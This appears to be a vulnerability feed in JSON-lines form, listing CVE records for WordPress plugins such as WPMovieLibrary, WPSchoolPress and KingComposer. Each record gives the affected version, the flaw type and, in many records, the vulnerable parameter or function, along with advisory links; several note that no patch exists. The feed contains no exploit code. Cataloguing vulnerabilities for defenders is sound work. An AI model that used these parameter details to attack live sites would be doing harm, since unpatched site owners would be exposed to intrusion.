{"CVE_ID":"CVE-2024-13624","slug":"wpmovielibrary","versionImpact":"2.1.4.8","description":"The WPMovieLibrary WordPress plugin through 2.1.4.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c19b56cc-634f-420f-b6a0-9a10ad159049\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c19b56cc-634f-420f-b6a0-9a10ad159049\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2163","slug":"zoorum-comments","versionImpact":"0.9","description":"The Zoorum Comments plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 0.9. This is due to missing or incorrect nonce validation on the zoorum_set_options() function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L18\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L18\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L38\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/zoorum-comments\\\/tags\\\/0.9\\\/zoorum-comments-admin.php#L38\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zoorum-comments\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/zoorum-comments\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b58fb0f-c7ac-4ee6-84f1-ac14617a7c2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2b58fb0f-c7ac-4ee6-84f1-ac14617a7c2b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32218","slug":"posts-table-filterable","versionImpact":"1.0.4","description":"Missing Authorization vulnerability in RealMag777 TableOn \u2013 WordPress Posts Table Filterable allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects TableOn \u2013 WordPress Posts Table Filterable: from n\/a through 1.0.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-wordpress-posts-table-filterable-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/posts-table-filterable\\\/vulnerability\\\/wordpress-tableon-wordpress-posts-table-filterable-plugin-1-0-4-broken-access-control-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4667","slug":"simply-schedule-appointments","versionImpact":"1.6.8.30","description":"The Appointment Booking Calendar \u2014 Simply Schedule Appointments Booking Plugin plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's ssa_admin_upcoming_appointments, ssa_admin_upcoming_appointments, and ssa_past_appointments shortcodes in all versions up to, and including, 1.6.8.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L718\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L718\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L784\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.24\\\/includes\\\/class-shortcodes.php#L784\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306064\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.32\\\/includes\\\/class-shortcodes.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3306064\\\/simply-schedule-appointments\\\/tags\\\/1.6.8.32\\\/includes\\\/class-shortcodes.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-schedule-appointments\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/simply-schedule-appointments\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/414173b9-d23e-4e44-bf8c-77a074bb09e9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/414173b9-d23e-4e44-bf8c-77a074bb09e9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6719","slug":"terms-descriptions","versionImpact":"3.4.8","description":"The Terms descriptions plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.4.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/terms-descriptions\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/terms-descriptions\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a27b8d53-7229-4c88-9bda-5db31b0f8d92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a27b8d53-7229-4c88-9bda-5db31b0f8d92?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-8719","slug":"translate-this-google-translate-web-element-shortcode","versionImpact":"1.0","description":"The Translate This gTranslate Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018base_lang\u2019 parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/translate-this-google-translate-web-element-shortcode\\\/trunk\\\/translate_this_plugin.php\",\"name\":\"https:\\\/\\\/plugins.svn.wordpress.org\\\/translate-this-google-translate-web-element-shortcode\\\/trunk\\\/translate_this_plugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/translate-this-google-translate-web-element-shortcode\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/translate-this-google-translate-web-element-shortcode\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f1a21c-2de0-4f41-b61e-7c4742900762?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a7f1a21c-2de0-4f41-b61e-7c4742900762?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0558","slug":"contentstudio","versionImpact":"1.2.5","description":"The ContentStudio plugin for WordPress is vulnerable to authorization bypass due to an unsecure token check that is susceptible to type juggling in versions up to, and including, 1.2.5. This makes it possible for unauthenticated attackers to execute functions intended for use by users with proper API keys.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L416\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c31828dc-ef94-4895-8395-a5d52a0a82bd\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c31828dc-ef94-4895-8395-a5d52a0a82bd\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/ti.wordfence.io\\\/vulnerabilities\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"name\":\"https:\\\/\\\/ti.wordfence.io\\\/vulnerabilities\\\/52db8d41-859a-4d68-8b83-3d3af8f1bf64\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0063","slug":"synved-shortcodes","versionImpact":"1.6.36","description":"The WordPress Shortcodes WordPress plugin through 1.6.36 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2262f2fc-8122-46ed-8e67-8c34ee35fc97\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2262f2fc-8122-46ed-8e67-8c34ee35fc97\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0924","slug":"popup-zyrex","versionImpact":"1.0","description":"The ZYREX POPUP WordPress plugin through 1.0 does not validate the type of files uploaded when creating a popup, allowing a high privileged user (such as an Administrator) to upload arbitrary files, even when modifying the file system is disallowed, such as in a multisite install.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0fd0d7a5-9263-43b6-9244-7880c3d3e6f4\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0fd0d7a5-9263-43b6-9244-7880c3d3e6f4\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6082","slug":"enigma-chartjs","versionImpact":"2023.2","description":"The chartjs WordPress plugin through 2023.2 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3d43aac-66c8-4218-b3f0-5256f895eda3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c3d43aac-66c8-4218-b3f0-5256f895eda3\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/lynk.nl\\\/\",\"name\":\"https:\\\/\\\/lynk.nl\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4160","slug":"download-manager","versionImpact":"3.2.90","description":"The Download Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wpdm-all-packages' shortcode in all versions up to, and including, 3.2.90 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f51258a-e228-412f-9d97-28ab679136d7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9f51258a-e228-412f-9d97-28ab679136d7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=2996137#L202\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/download-manager\\\/trunk\\\/src\\\/Package\\\/views\\\/all-packages-shortcode.php?rev=2996137#L202\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_all_packages-list-all-downloads-in-tabular-format-in-a-page\\\/\",\"name\":\"https:\\\/\\\/www.wpdownloadmanager.com\\\/doc\\\/short-codes\\\/wpdm_all_packages-list-all-downloads-in-tabular-format-in-a-page\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/download-manager\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080781\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080781\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4258","slug":"yotuwp-easy-youtube-embed","versionImpact":"1.3.13","description":"The Video Gallery \u2013 YouTube Playlist, Channel Gallery by YotuWP plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.3.13 via the settings parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6feae1c4-3735-4a33-85a5-867d458d2e8a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6feae1c4-3735-4a33-85a5-867d458d2e8a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/yotuwp.php#L731\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotuwp-easy-youtube-embed\\\/trunk\\\/yotuwp.php#L731\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6314","slug":"iq-testimonials","versionImpact":"2.2.7","description":"The IQ Testimonials plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'process_image_upload' function in versions up to, and including, 2.2.7. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible. This can only be exploited if the 'gd' php extension is not loaded on the server.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bec50640-a550-49a8-baf6-2dd53995f90b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bec50640-a550-49a8-baf6-2dd53995f90b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iq-testimonials\\\/tags\\\/2.2.7\\\/lib\\\/iq-testimonials-form.php#L296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iq-testimonials\\\/tags\\\/2.2.7\\\/lib\\\/iq-testimonials-form.php#L296\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5765","slug":"wpstickybar-sticky-bar-sticky-header","versionImpact":"2.1.0","description":"The WpStickyBar  WordPress plugin through 2.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b73f84c-611e-4681-b362-35e721478ba4\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/0b73f84c-611e-4681-b362-35e721478ba4\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12270","slug":"beautiful-taxonomy-filters","versionImpact":"2.4.4","description":"The Beautiful taxonomy filters plugin for WordPress is vulnerable to SQL Injection via the 'selects[0][term]' parameter in all versions up to, and including, 2.4.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beautiful-taxonomy-filters\\\/trunk\\\/includes\\\/class-beautiful-taxonomy-filters.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/beautiful-taxonomy-filters\\\/trunk\\\/includes\\\/class-beautiful-taxonomy-filters.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/75c9c106-d1f9-43ee-be1f-3eddec8f2529?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12571","slug":"store-locator","versionImpact":"3.98.9","description":"The Store Locator for WordPress with Google Maps \u2013 LotsOfLocales plugin for WordPress is vulnerable to Local File Inclusion in version 3.98.9 via the 'sl_engine' parameter. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator\\\/trunk\\\/sl-functions.php#L1919\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/store-locator\\\/trunk\\\/sl-functions.php#L1919\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea89a6e-e089-4e8d-afd8-2a217f6910a6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4ea89a6e-e089-4e8d-afd8-2a217f6910a6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12213","slug":"wp-job-board-pro","versionImpact":"1.2.76","description":"The WP Job Board Pro plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.76. This is due to the plugin allowing a user to supply the 'role' field when registering. This makes it possible for unauthenticated attackers to register as an administrator on vulnerable sites.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/superio-job-board-wordpress-theme\\\/32180231\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cdfce88-b6c2-4820-9d6f-446f61b9b596?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7cdfce88-b6c2-4820-9d6f-446f61b9b596?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1670","slug":"wpschoolpress","versionImpact":"2.2.16","description":"The School Management System \u2013 WPSchoolPress plugin for WordPress is vulnerable to SQL Injection via the 'cid' parameter in all versions up to, and including, 2.2.16 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Custom-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/pages\\\/wpsp-exams.php#L186\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpschoolpress\\\/tags\\\/2.2.16\\\/pages\\\/wpsp-exams.php#L186\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38c28f4-e73a-4eb2-8bbd-73c849385c4e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f38c28f4-e73a-4eb2-8bbd-73c849385c4e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-32200","slug":"advanced-backgrounds","versionImpact":"1.12.7","description":"Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS) vulnerability in Nikita Advanced WordPress Backgrounds allows Code Injection. This issue affects Advanced WordPress Backgrounds: from n\/a through 1.12.4.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-backgrounds\\\/vulnerability\\\/wordpress-advanced-wordpress-backgrounds-plugin-1-12-4-content-injection-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/advanced-backgrounds\\\/vulnerability\\\/wordpress-advanced-wordpress-backgrounds-plugin-1-12-4-content-injection-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6070","slug":"restrict-file-access","versionImpact":"1.1.2","description":"The Restrict File Access plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 1.1.2 via the output() function. This makes it possible for authenticated attackers, with Subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/url_rewrite\\\/url_rewrite.php#L77\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/restrict-file-access\\\/trunk\\\/url_rewrite\\\/url_rewrite.php#L77\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9eec61-bf51-4cf7-b567-58ee2ccd91c5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6e9eec61-bf51-4cf7-b567-58ee2ccd91c5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-6718","slug":"b1-accounting","versionImpact":"2.2.56","description":"The B1.lt plugin for WordPress is vulnerable to SQL Injection due to a missing capability check on the b1_run_query AJAX action in all versions up to, and including, 2.2.56. This makes it possible for authenticated attackers, with Subscriber-level access and above, to execute and run arbitrary SQL commands.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/b1-accounting\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e479a3f-ef1a-4476-89e1-86d0f388f2c3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e479a3f-ef1a-4476-89e1-86d0f388f2c3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0557","slug":"contentstudio","versionImpact":"1.2.5","description":"The ContentStudio plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 1.2.5. This could allow unauthenticated attackers to obtain a nonce needed for the creation of posts.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2851006%40contentstudio%2Ftrunk&old=2844028%40contentstudio%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L709\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/contentstudio\\\/trunk\\\/contentstudio-plugin.php#L709\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62eb136f-3cb0-40dc-a154-015a7fa1077b\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62eb136f-3cb0-40dc-a154-015a7fa1077b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36701","slug":"kingcomposer","versionImpact":"2.9.3","description":"The Page Builder: KingComposer plugin for WordPress is vulnerable to Arbitrary File Uploads in versions up to, and including, 2.9.3 via the 'process_bulk_action' function in the 'kingcomposer\/includes\/kc.extensions.php' file. This makes it possible for authenticated users with author level permissions and above to upload arbitrary files onto the server which can be used to execute code on the server.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kingcomposer\\\/#developers\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a62dd0-386c-41b3-b8dd-ced443da9f92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/45a62dd0-386c-41b3-b8dd-ced443da9f92?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2320014%40kingcomposer&new=2320014%40kingcomposer&sfp_email=&sfph_mail=\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/wordpress-kingcomposer-page-builder-fixed-multiple-critical-vulnerabilities\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
